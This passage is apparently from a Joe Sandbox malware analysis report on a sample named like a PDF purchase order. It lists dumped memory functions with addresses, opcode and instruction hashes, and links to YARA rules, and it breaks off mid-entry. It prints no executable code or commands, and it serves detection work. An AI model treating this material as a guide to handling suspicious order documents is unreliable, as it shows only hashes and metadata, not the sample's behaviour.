                                                                        Function 047F6870 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a18de65ab87f2da36d4a9502ce0167b9211a7917aec454686acd55f6ba548ce
                                                                        • Instruction ID: eeb47bed35288f8f1310ea3ac8a3acbb0eb7b340e7b1d5855ec5ee659f3dc1a6
                                                                        • Opcode Fuzzy Hash: 3a18de65ab87f2da36d4a9502ce0167b9211a7917aec454686acd55f6ba548ce
                                                                        • Instruction Fuzzy Hash: 3311A1B4D09248EFC701DFA8D85159CBFB4EB49304F2091EED84897352E7316A06DB42
                                                                        Function 00DF1D59 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08dc3a655ae81f6df4ddbb07ec9ab0268f23267452269babdd235a0c98f5ff9f
                                                                        • Instruction ID: d3d6106e9acac7df1e67d750b6a5309cc4856037cbf024483a87580f5c3d5258
                                                                        • Opcode Fuzzy Hash: 08dc3a655ae81f6df4ddbb07ec9ab0268f23267452269babdd235a0c98f5ff9f
                                                                        • Instruction Fuzzy Hash: 49113C38B00108CFEB18DF98D968BBD77B1EF44314F268165E602AB3A0C775DD458B61
                                                                        Function 047F4EFA Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3dfe8e5f81f2fe6f4cdbd694f8a7c14a2805da0197012f8f7e30e5108e28c8f
                                                                        • Instruction ID: 773863fb3147008eebf9cac64f82d3eee79384d2a87157f2a3004f341d76d1f2
                                                                        • Opcode Fuzzy Hash: d3dfe8e5f81f2fe6f4cdbd694f8a7c14a2805da0197012f8f7e30e5108e28c8f
                                                                        • Instruction Fuzzy Hash: DD210AB4A01118CFDB50EF64C9A4BADB7B2FB49301F1481E9D90AA7345CA745E85CF01
                                                                        Function 00DF2140 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b964bf04bcbc25bb15505f8ca21bda49f42fee85dbf31f6a5ebc0f01d0c0f424
                                                                        • Instruction ID: 231fb723389e5347ab7d3b1e0b94de1de4caf5b3fb51950873cfd38e133bdd37
                                                                        • Opcode Fuzzy Hash: b964bf04bcbc25bb15505f8ca21bda49f42fee85dbf31f6a5ebc0f01d0c0f424
                                                                        • Instruction Fuzzy Hash: 0A01F239704208AFC7049B5D9880B7AB6E6EBC8351F258436F70AD7391DA71CC0287BA
                                                                        Function 00DF2131 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2419768a70fa34d9a2ebf4ffa840264560abef21155ebc8c40d69c38694134a7
                                                                        • Instruction ID: d6b75202df77c7cac75bdc79fff05cf3388debb4b4d468ec89979d511f4404fc
                                                                        • Opcode Fuzzy Hash: 2419768a70fa34d9a2ebf4ffa840264560abef21155ebc8c40d69c38694134a7
                                                                        • Instruction Fuzzy Hash: EB01D8797442085FC71497698C44B7E7AA2EB89340F15C435E746E73A1DA74CC068777
                                                                        Function 047F9ABC Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7952cfbad4744f9c62bf55d941051a35895f89edf33a16b35694a3afbf171047
                                                                        • Instruction ID: 1841a1dd78a2a113f9388fd2bd1d76adfa3ae41a8500bd57f45618ca473add1a
                                                                        • Opcode Fuzzy Hash: 7952cfbad4744f9c62bf55d941051a35895f89edf33a16b35694a3afbf171047
                                                                        • Instruction Fuzzy Hash: 1221B2B0904228CFDB61CF68CC94BEABBB1BB49305F1081E9D509A7391D736AE85CF40
                                                                        Function 047F2D35 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c77bd51167196715588f3397b2fb314b02911fee1d31271257535cb294254e6
                                                                        • Instruction ID: 23b4075e84f7433f976f7433bb2c9f074b68a4f6d43a645a7e4b35ec7491e0d1
                                                                        • Opcode Fuzzy Hash: 2c77bd51167196715588f3397b2fb314b02911fee1d31271257535cb294254e6
                                                                        • Instruction Fuzzy Hash: 901137B0A05218CFEB21DF24D998BA9B7B6FB49300F10A0D9DA0DA3346D7315E80CF05
                                                                        Function 072EF590 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 955183f41b5bd7ae42f2a67a33ce276581766cb11bf82e989e0367d7e7ce0fab
                                                                        • Instruction ID: 9dbe46bfda83d03f826297ec1951a71bba111cc02ce6ee03a379dff4b5e79b25
                                                                        • Opcode Fuzzy Hash: 955183f41b5bd7ae42f2a67a33ce276581766cb11bf82e989e0367d7e7ce0fab
                                                                        • Instruction Fuzzy Hash: 4811B3B0E0020E9FCB48DFB9D9556BEBBF5BF88300F10856A9418A7355DB319A458B91
                                                                        Function 00A5D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714227454.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a5d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c7f7bdd0827c43d84a2a9ae6c9332ac4bb48573c377edfe0be269c9988206e8
                                                                        • Instruction ID: 1cca2be83ac2208e81f5c31a49bf2ee3ab0d4938bd9b071d6a4d7b593f2d0ce1
                                                                        • Opcode Fuzzy Hash: 5c7f7bdd0827c43d84a2a9ae6c9332ac4bb48573c377edfe0be269c9988206e8
                                                                        • Instruction Fuzzy Hash: 3901DB71408340AAE7304B29CD84767FFA8FF45326F18C529ED4A5B2C6C379D84AC6B1
                                                                        Function 00DF0A89 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2dd7359f0ae08d5abb888569a4c2e63e1442296ef453c74a0eb9cedde6a51f5
                                                                        • Instruction ID: 64e331b6ba592464b43e9c350b8d6541f7927651e44536df7af138199441b110
                                                                        • Opcode Fuzzy Hash: d2dd7359f0ae08d5abb888569a4c2e63e1442296ef453c74a0eb9cedde6a51f5
                                                                        • Instruction Fuzzy Hash: 4801B132D1434B9ACB019BB4DC004DEBF72EFCA320F190796D511B71A0EA70258ACBA1
                                                                        Function 047F4230 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f8512140de29420407288161fdf41e54e94ab698e57c5f3dc167bff48f2920e
                                                                        • Instruction ID: 9343efbc8331d2ab92fffb978ec7bcc651a44e67187a477c8c719f9c126f43f0
                                                                        • Opcode Fuzzy Hash: 3f8512140de29420407288161fdf41e54e94ab698e57c5f3dc167bff48f2920e
                                                                        • Instruction Fuzzy Hash: EF11F874A102288FDBA1CF64DD90BE9B7F5BB09300F1480DAD509A7382E776AE81CF00
                                                                        Function 00A5D005 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714227454.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a5d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13a485d1f5c9780aff377b3b7ac7f71dfde9cc82d531c689d8d41fcd25f37ab6
                                                                        • Instruction ID: 6ee1ead89748589560bb1c01fa20ad773e3451b33fd8fb4f838cf1ae98e4cace
                                                                        • Opcode Fuzzy Hash: 13a485d1f5c9780aff377b3b7ac7f71dfde9cc82d531c689d8d41fcd25f37ab6
                                                                        • Instruction Fuzzy Hash: 77014C6100E3C09ED7128B258C94B56BFB4EF53225F18C1DBDD898F2E7C2699849C772
                                                                        Function 047F8404 Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 899b25dc6c21870bdc496d7fe12d072074eafba7100ac070a23c3792cdbfedb1
                                                                        • Instruction ID: f1e68b06272a5d47f3a64971bdf47f8e65c1e2e69500b904c3f9dc9946a6b5fb
                                                                        • Opcode Fuzzy Hash: 899b25dc6c21870bdc496d7fe12d072074eafba7100ac070a23c3792cdbfedb1
                                                                        • Instruction Fuzzy Hash: 5E113370A05208CFDB90EFA8E9A0AADBBB2BF49305F61816ED515B7345DB346D41CF02
                                                                        Function 00DF1CDB Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 071a110722c811911f676c6914ddecfaea5e3b320108c9b02c80f9041f952b27
                                                                        • Instruction ID: e81881cb0a692c9c5714b22fcbb9186f95530deb2d06b7be1170b1dc7fe57567
                                                                        • Opcode Fuzzy Hash: 071a110722c811911f676c6914ddecfaea5e3b320108c9b02c80f9041f952b27
                                                                        • Instruction Fuzzy Hash: 33011678600219CFC708CBA5CD54BBDBBB5BF49304F25446AE602DB2A5DBB49D01CB20
                                                                        Function 047F5F08 Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a15e7c0aa384e9f2e869e26f081e819f8a730bf7531e6785b76bd0e4d2c935b
                                                                        • Instruction ID: 552aa9955b867eb7a0891ef8b31b1c537dcc6f5394a427b5fed3b3396cb9be61
                                                                        • Opcode Fuzzy Hash: 1a15e7c0aa384e9f2e869e26f081e819f8a730bf7531e6785b76bd0e4d2c935b
                                                                        • Instruction Fuzzy Hash: 07F0C27190114CBFCB40DFA4CD0059DBBF6DB46310B1084D6D90997362EA32AE01DB92
                                                                        Function 00DF0B0F Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e16a2d93f1add693d42bf21405a8bdb20d60019925e8e37f8b85c0ae7f8db2fe
                                                                        • Instruction ID: 35d000fc67df4e420a8c261134b29693b7e0a2c9b0c3b45eba4c3b334442ea87
                                                                        • Opcode Fuzzy Hash: e16a2d93f1add693d42bf21405a8bdb20d60019925e8e37f8b85c0ae7f8db2fe
                                                                        • Instruction Fuzzy Hash: 58F022329142099FCB11CB24C8A59EFBFB24F84310F04862AC013A72C0DEB0490B8AC2
                                                                        Function 047FA10A Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38f47b2a5e56a20dbb9dc94d4ffe796e7cea71f0e59ad431d95a06b05f1bc71f
                                                                        • Instruction ID: 39868caa9b20c37f6916f99d663a79d072e21a9ea0ecc0a772b1e0b26df6751b
                                                                        • Opcode Fuzzy Hash: 38f47b2a5e56a20dbb9dc94d4ffe796e7cea71f0e59ad431d95a06b05f1bc71f
                                                                        • Instruction Fuzzy Hash: E811AEB0A4022ACFCB24CF14D994BE9B7B1BB45304F4081EAD509AB781DB71AE85DF45
                                                                        Function 047FAAA2 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0a3e001cd5282a63b79df9745095df085f35950ff4b2160a6f3c7014981718f8
                                                                        • Instruction ID: 8ad798df4c179686cf8c973d4e80feee87d4ab6c127bf09049d6955f98164de1
                                                                        • Opcode Fuzzy Hash: 0a3e001cd5282a63b79df9745095df085f35950ff4b2160a6f3c7014981718f8
                                                                        • Instruction Fuzzy Hash: 16014B72C0020AABCF01DF99CC009EEBB74FF89324F04C219E95827351E731A566DB90
                                                                        Function 047F8B40 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9eeb81fd13edc93eb8a5864b11b9ed8a23805b69f2f835be6921feea4d82c34a
                                                                        • Instruction ID: 1d8bb7564d21d6efdc8da1257a6405cee5697467fb2ed516498d353b0f7c715f
                                                                        • Opcode Fuzzy Hash: 9eeb81fd13edc93eb8a5864b11b9ed8a23805b69f2f835be6921feea4d82c34a
                                                                        • Instruction Fuzzy Hash: 66F0BE79909208EFCF05EF90DC008ADBF75EF46300F048199ED0027351CB329A22EB52
                                                                        Function 072D7BDD Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: daa3c291399dcf1762c1d7a600734e0fae8477ef7cf6b5881ba516a30f016e10
                                                                        • Instruction ID: 1047128d31101eb447d76a2b2f59d3ea90f44d3caf58ea5282d40ded9a0689a6
                                                                        • Opcode Fuzzy Hash: daa3c291399dcf1762c1d7a600734e0fae8477ef7cf6b5881ba516a30f016e10
                                                                        • Instruction Fuzzy Hash: B5012CB5A102588FCB94DF59E8549EEB3B6FB89341F2080D9E90AE7355CB349D84CF10
                                                                        Function 047FAAB0 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d257e14d0cd3278b06873aabf1a055085f9af6ce3cbc9a4fde96b773c649dea1
                                                                        • Instruction ID: 1f17ca57dfd89bccdbe012cbc712d6cf5ee430685f6f0a2a50c9d9aa255c893d
                                                                        • Opcode Fuzzy Hash: d257e14d0cd3278b06873aabf1a055085f9af6ce3cbc9a4fde96b773c649dea1
                                                                        • Instruction Fuzzy Hash: A5F0C93190060AABCF11DF99D8009EDBB75FF89320F04C519EA5827250D771A566DB90
                                                                        Function 047F58F0 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93bec1f13bf8bc3d2f9aab94b54f850264dbf9f9e597fa3f2a6d0fb27c25979a
                                                                        • Instruction ID: 0e5d671300e65756b55fa3c6c2f274d962ef2df2c7c25d8a103eacee80d2980c
                                                                        • Opcode Fuzzy Hash: 93bec1f13bf8bc3d2f9aab94b54f850264dbf9f9e597fa3f2a6d0fb27c25979a
                                                                        • Instruction Fuzzy Hash: 90F08C78E0A208AFCB45DBA8DC4469CBBF4EB89310F1481EAD96893352D6356A05DF91
                                                                        Function 047F68F0 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e03622dcad5a82bb1d0e72f418e7bc79d4092a98ea943bf4f30c1da3e7df8a65
                                                                        • Instruction ID: 2edadf330bbc582069da2660c3aa384d2e3e404c27a0b52f002c20fe87be0620
                                                                        • Opcode Fuzzy Hash: e03622dcad5a82bb1d0e72f418e7bc79d4092a98ea943bf4f30c1da3e7df8a65
                                                                        • Instruction Fuzzy Hash: C3F0A0F0D0520C9FCB45DFB498401987FB4DB4A210F2020EAD55897761E2305B56E741
                                                                        Function 00DFF258 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1635806378020572e9289c0b514f29eb503486a76b86389dfe7be52ad53d68a1
                                                                        • Instruction ID: 1e0c1af8a443aa30a24ff05ad02b68dd537ede1d4faa0a1d833f80732452fef2
                                                                        • Opcode Fuzzy Hash: 1635806378020572e9289c0b514f29eb503486a76b86389dfe7be52ad53d68a1
                                                                        • Instruction Fuzzy Hash: E0F0E23480824CABCF00CB98D4405BCBF70FF56320F14C1A9E990A7251CB325B02EB68
                                                                        Function 047F6C60 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c382470fce6301e2a8c2d34f9d8cf50a07b0ee39396d361c819abadb19f19c7a
                                                                        • Instruction ID: 3c191c1725925b1d468a515d1f821915f8b40bd81a7d0deae8eeeeac01e63b95
                                                                        • Opcode Fuzzy Hash: c382470fce6301e2a8c2d34f9d8cf50a07b0ee39396d361c819abadb19f19c7a
                                                                        • Instruction Fuzzy Hash: 6EF0BE74D0A288AFCB41CFA4D8005ACBFB4EB49310F04C1DAEC9893342D631AB4ADB51
                                                                        Function 00DF3417 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39dfb9c956f6f3b274eb89f4ae9f9daa222c9425d65378de559e5508888c20b1
                                                                        • Instruction ID: ad7216ec06f606adf63960292658ddc2f937d8add97d2d55adca8ffe90e41c72
                                                                        • Opcode Fuzzy Hash: 39dfb9c956f6f3b274eb89f4ae9f9daa222c9425d65378de559e5508888c20b1
                                                                        • Instruction Fuzzy Hash: 74E0E5313042441FCB119379AD5146EAB66EBC13517008239E14EC7262CBA0484E4790
                                                                        Function 047F80E7 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c8444a6bd593218c78c7b687c18af0b78a5092e883bb5e3d8a8e9a00cedba5c
                                                                        • Instruction ID: b9eaab7505c46554c183cabab28e00431995227dbf29af60adf1dee3f4801ace
                                                                        • Opcode Fuzzy Hash: 7c8444a6bd593218c78c7b687c18af0b78a5092e883bb5e3d8a8e9a00cedba5c
                                                                        • Instruction Fuzzy Hash: D601D274A05208CFDB90EF68D9A0AADBBB2BF48304F20826ED515A3345DB306D41CF42
                                                                        Function 047FCC60 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4a328208c728a1c19e0176df717f63c4f7171173edf40b8c42b35fd097fa046
                                                                        • Instruction ID: a60aa9a4ef6b027739c9a3f0cd868e8852eb25921097142b87614d9f3d038516
                                                                        • Opcode Fuzzy Hash: d4a328208c728a1c19e0176df717f63c4f7171173edf40b8c42b35fd097fa046
                                                                        • Instruction Fuzzy Hash: B4F05E74D05308AFC741CFA8D8445ACBBB4BB49300F10C0DAD898A7351E6315A06DB41
                                                                        Function 047FC4A9 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 89bc396fb0f35c78ac989ad12effd04abc2e819041c926ba49ce03c64890d67f
                                                                        • Instruction ID: 391cd5980d5b926924812e5c36bfabaea8f1ff9f480083d9f8c1465b9c8ebe88
                                                                        • Opcode Fuzzy Hash: 89bc396fb0f35c78ac989ad12effd04abc2e819041c926ba49ce03c64890d67f
                                                                        • Instruction Fuzzy Hash: BEF0123590420CEFCB41DF98D840AADBFB5FF48310F0080A9ED1962351CB32AA22EF81
                                                                        Function 047F7EA0 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 173441c3a489dab78c83e5982cd34cf68c7c2bf27c9c67ada3bf50f49c5dfd1c
                                                                        • Instruction ID: c41d76ce371890a0dcbc0268aa8942ae9b4abe739b551d15f1b0f29094ecce10
                                                                        • Opcode Fuzzy Hash: 173441c3a489dab78c83e5982cd34cf68c7c2bf27c9c67ada3bf50f49c5dfd1c
                                                                        • Instruction Fuzzy Hash: 3BF0A074D09248AFCB05DBB8D8419ACFFB4EB49310F0080EBE84497352DB365E16DB91
                                                                        Function 047FB6A0 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
